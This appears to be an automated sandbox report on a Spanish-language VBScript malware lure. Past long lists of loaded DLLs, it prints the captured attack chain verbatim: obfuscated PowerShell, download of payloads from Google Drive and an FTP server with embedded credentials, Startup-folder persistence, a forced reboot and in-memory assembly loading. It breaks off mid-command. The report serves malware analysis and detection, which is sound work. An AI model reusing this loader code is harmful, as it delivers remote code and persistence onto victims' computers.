Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: avicap32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvfw32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Shell") : OaVMr.Run( "powershell -command ""$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwBC???Gw???J??????7???Ck???JwB??????E??????c???BK???Dg???Nw???1???DE???MgBv??

.NET source code contains potential unpacker

Source: 4.2.powershell.exe.1d3944eae80.0.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 4.2.powershell.exe.1d3ab580000.2.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 4.2.powershell.exe.1d3930c6538.1.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, Program.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 18.2.powershell.exe.2078fd80b60.1.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 18.2.powershell.exe.2078fd84ec0.0.raw.unpack, Program.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 23.2.powershell.exe.20958f44b38.1.raw.unpack, Program.cs	.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Source: 23.2.powershell.exe.20958f407d8.2.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 23.2.powershell.exe.20958820000.0.raw.unpack, -.cs	.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String( $kahlN ) ); $vQpeD = $vQpeD[-1..-$vQpeD.Length] -join '';$vQpeD = $vQpeD.replace('%XRqhI%','C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs');powershell $vQpeD$glo

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???Qw
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 